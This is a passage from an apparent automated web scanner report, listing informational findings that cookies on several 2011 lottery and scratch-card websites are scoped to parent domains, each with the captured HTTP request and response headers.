<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.149. http://www.mundirasca.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.150. http://www.mundirasca.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.151. http://www.mundirasca.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.152. http://www.mundirasca.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.153. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/click/MundiRasca.com/SPA/Home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

11.154. http://www.pclscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:28 GMT; path=/
UniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=21zqne55winufojltrq5mhau; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: UniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.155. http://www.pclscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:27 GMT; path=/
UniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ytdn42ugius2ml55n3ca0455; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:27 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: UniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.156. http://www.pclscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:49 GMT; path=/
UniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjkur145mkgzhfqat41wv5ic; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: UniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.157. http://www.pclscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:22 GMT; path=/
UniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5lxnekmaeiw34y45mrj1pc45; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:22 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: UniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.158. http://www.pclscratch.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:15 GMT; path=/
UniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuwhs3rkmog2nqfbfnefuyv5; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: UniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.159. http://www.pclscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Terms.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsnjci453g20ax45pj1enb55; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.160. http://www.postcodelottery.com/AboutUs.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:47 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:47 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16632

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.161. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/PrivacyPolicy.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/PrivacyPolicy.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
